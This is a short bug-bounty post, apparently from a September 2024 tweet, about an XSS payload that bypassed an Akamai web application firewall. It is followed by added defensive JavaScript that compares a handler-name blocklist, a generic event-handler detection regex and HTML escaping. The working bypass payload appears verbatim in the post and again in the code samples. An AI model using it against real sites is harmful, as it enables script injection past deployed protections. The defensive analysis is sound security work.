A WAF bypass for Akamai was discovered that led to 30 XSS vulnerabilities in a large platform. The bypass payload used was '><input type="hidden" oncontentvisibilityautostatechange="confirm(/Bypassed/)" style="content-visibility:auto">'. The payload relies on the oncontentvisibilityautostatechange event-handler attribute to trigger a confirmation dialog, which got past Akamai's protections. This finding highlights the importance of thorough WAF configuration and of protections against XSS attacks. #BugBounty #WAF #XSS
WAF AKAMAI Bypass
Lead to 30 XSS in large BBP?
"><input type="hidden" oncontentvisibilityautostatechange="confirm(/Bypassed/)" style="content-visibility:auto">
#BugBounty #Tips #Waf
pic.twitter.com/qaD1HsMyqx — @HackingTeam777, September 16, 2024
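
The bypass described above, seen from the defender's side, as an added example that is not part of the original post and not Akamai's rule logic (which the page does not describe). It assumes the filter missed the payload because it matched an enumerated list of handler names; the list, function names and the two extra samples are constructed for illustration.

```javascript
// Added example; constructed lists and samples, not Akamai's rules.

// Weak: enumerated handler names (constructed, deliberately incomplete list).
const KNOWN_HANDLERS = ["onclick", "onerror", "onload", "onmouseover", "onfocus"];

function blocklistFlags(input) {
  const lower = input.toLowerCase();
  return KNOWN_HANDLERS.some((h) => lower.includes(h + "="));
}

// Stronger heuristic: flag any on* attribute inside something shaped like a tag,
// so handlers that browsers add later are caught without updating a list.
// This is a regex heuristic, not an HTML parser; it is defence in depth only.
function genericHandlerFlags(input) {
  const tags = input.match(/<[a-z][^>]*>/gi) || [];
  return tags.some((tag) => /[\s"'/]on[a-z]+\s*=/i.test(tag));
}

// The actual fix: encode untrusted data before writing it into HTML, so the
// leading quote and angle brackets can never close the attribute or open a tag.
const HTML_ENTITIES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };

function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ENTITIES[ch]);
}

// Samples: the first is the payload quoted on this page; the others are constructed.
const SAMPLES = {
  pagePayload: '"><input type="hidden" oncontentvisibilityautostatechange="confirm(/Bypassed/)" style="content-visibility:auto">',
  knownHandler: '<a onclick="track()">x</a>',
  benignMarkup: '<b class="note">shop online = often</b>',
};

function evaluate(input) {
  return {
    blocklist: blocklistFlags(input),
    generic: genericHandlerFlags(input),
    encoded: escapeHtml(input),
  };
}

for (const [name, input] of Object.entries(SAMPLES)) {
  const r = evaluate(input);
  console.log(name, "blocklist:", r.blocklist, "generic:", r.generic);
}
```

The enumerated list passes the page's payload while the generic on* check flags it, and the encoded form contains no raw quote or angle bracket regardless of which handler name is used.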